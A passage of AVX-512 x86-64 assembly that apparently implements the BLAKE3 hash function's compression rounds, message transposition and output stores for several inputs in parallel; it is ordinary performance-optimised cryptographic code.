vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm25
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm24
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm30
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm28
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm29
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm18
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm19
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm22
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm27
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm17
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm31
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm25
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm30
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm19
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm26
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm20
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpxord zmm0, zmm0, zmm8
vpxord zmm1, zmm1, zmm9
vpxord zmm2, zmm2, zmm10
vpxord zmm3, zmm3, zmm11
vpxord zmm4, zmm4, zmm12
vpxord zmm5, zmm5, zmm13
vpxord zmm6, zmm6, zmm14
vpxord zmm7, zmm7, zmm15
movzx eax, byte ptr [rbp+0x38]
jne 9b
mov rbx, qword ptr [rbp+0x50]
vpunpckldq zmm16, zmm0, zmm1
vpunpckhdq zmm17, zmm0, zmm1
vpunpckldq zmm18, zmm2, zmm3
vpunpckhdq zmm19, zmm2, zmm3
vpunpckldq zmm20, zmm4, zmm5
vpunpckhdq zmm21, zmm4, zmm5
vpunpckldq zmm22, zmm6, zmm7
vpunpckhdq zmm23, zmm6, zmm7
vpunpcklqdq zmm0, zmm16, zmm18
vpunpckhqdq zmm1, zmm16, zmm18
vpunpcklqdq zmm2, zmm17, zmm19
vpunpckhqdq zmm3, zmm17, zmm19
vpunpcklqdq zmm4, zmm20, zmm22
vpunpckhqdq zmm5, zmm20, zmm22
vpunpcklqdq zmm6, zmm21, zmm23
vpunpckhqdq zmm7, zmm21, zmm23
vshufi32x4 zmm16, zmm0, zmm4, 0x88
vshufi32x4 zmm17, zmm1, zmm5, 0x88
vshufi32x4 zmm18, zmm2, zmm6, 0x88
vshufi32x4 zmm19, zmm3, zmm7, 0x88
vshufi32x4 zmm20, zmm0, zmm4, 0xDD
vshufi32x4 zmm21, zmm1, zmm5, 0xDD
vshufi32x4 zmm22, zmm2, zmm6, 0xDD
vshufi32x4 zmm23, zmm3, zmm7, 0xDD
vshufi32x4 zmm0, zmm16, zmm17, 0x88
vshufi32x4 zmm1, zmm18, zmm19, 0x88
vshufi32x4 zmm2, zmm20, zmm21, 0x88
vshufi32x4 zmm3, zmm22, zmm23, 0x88
vshufi32x4 zmm4, zmm16, zmm17, 0xDD
vshufi32x4 zmm5, zmm18, zmm19, 0xDD
vshufi32x4 zmm6, zmm20, zmm21, 0xDD
vshufi32x4 zmm7, zmm22, zmm23, 0xDD
vmovdqu32 zmmword ptr [rbx], zmm0
vmovdqu32 zmmword ptr [rbx+0x1*0x40], zmm1
vmovdqu32 zmmword ptr [rbx+0x2*0x40], zmm2
vmovdqu32 zmmword ptr [rbx+0x3*0x40], zmm3
vmovdqu32 zmmword ptr [rbx+0x4*0x40], zmm4
vmovdqu32 zmmword ptr [rbx+0x5*0x40], zmm5
vmovdqu32 zmmword ptr [rbx+0x6*0x40], zmm6
vmovdqu32 zmmword ptr [rbx+0x7*0x40], zmm7
vmovdqa32 zmm0, zmmword ptr [rsp]
vmovdqa32 zmm1, zmmword ptr [rsp+0x1*0x40]
vmovdqa32 zmm2, zmm0
vpaddd zmm2{k1}, zmm0, dword ptr [ADD16+rip] {1to16}
vpcmpltud k2, zmm2, zmm0
vpaddd zmm1 {k2}, zmm1, dword ptr [ADD1+rip] {1to16}
vmovdqa32 zmmword ptr [rsp], zmm2
vmovdqa32 zmmword ptr [rsp+0x1*0x40], zmm1
add rdi, 128
add rbx, 512
mov qword ptr [rbp+0x50], rbx
sub rsi, 16
cmp rsi, 16
jnc 2b
test rsi, rsi
jnz 3f
4:
vzeroupper
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 6
3:
test esi, 0x8
je 3f
vpbroadcastd ymm0, dword ptr [rcx]
vpbroadcastd ymm1, dword ptr [rcx+0x4]
vpbroadcastd ymm2, dword ptr [rcx+0x8]
vpbroadcastd ymm3, dword ptr [rcx+0xC]
vpbroadcastd ymm4, dword ptr [rcx+0x10]
vpbroadcastd ymm5, dword ptr [rcx+0x14]
vpbroadcastd ymm6, dword ptr [rcx+0x18]
vpbroadcastd ymm7, dword ptr [rcx+0x1C]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x20]
mov r13, qword ptr [rdi+0x28]
mov r14, qword ptr [rdi+0x30]
mov r15, qword ptr [rdi+0x38]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
2:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x80]
cmove eax, ebx
mov dword ptr [rsp+0x88], eax
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x40], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x40]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x40], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x40], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x40]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x40], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm16, ymm12, ymm14, 136
vshufps ymm17, ymm12, ymm14, 221
vshufps ymm18, ymm13, ymm15, 136
vshufps ymm19, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x30]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x30], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x30], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x30]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x30], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x30], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm20, ymm12, ymm14, 136
vshufps ymm21, ymm12, ymm14, 221
vshufps ymm22, ymm13, ymm15, 136
vshufps ymm23, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x20], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x20]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x20], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x20], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x20]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x20], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm24, ymm12, ymm14, 136
vshufps ymm25, ymm12, ymm14, 221
vshufps ymm26, ymm13, ymm15, 136
vshufps ymm27, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x10]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x10], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x10], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x10]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x10], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x10], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm28, ymm12, ymm14, 136
vshufps ymm29, ymm12, ymm14, 221
vshufps ymm30, ymm13, ymm15, 136
vshufps ymm31, ymm13, ymm15, 221
vpbroadcastd ymm8, dword ptr [BLAKE3_IV_0+rip]
vpbroadcastd ymm9, dword ptr [BLAKE3_IV_1+rip]
vpbroadcastd ymm10, dword ptr [BLAKE3_IV_2+rip]
vpbroadcastd ymm11, dword ptr [BLAKE3_IV_3+rip]
vmovdqa ymm12, ymmword ptr [rsp]
vmovdqa ymm13, ymmword ptr [rsp+0x40]
vpbroadcastd ymm14, dword ptr [BLAKE3_BLOCK_LEN+rip]
vpbroadcastd ymm15, dword ptr [rsp+0x88]
vpaddd ymm0, ymm0, ymm16
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm20
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm17
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm21
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm24
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm28
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm25
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm29
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm18
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm23
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm22
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm16
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm17
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm25
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm27
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm30
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm19
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm29
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm20
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm18
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm22
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm27
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm21
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm31
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm26
vpaddd ymm1, ymm1, ymm28
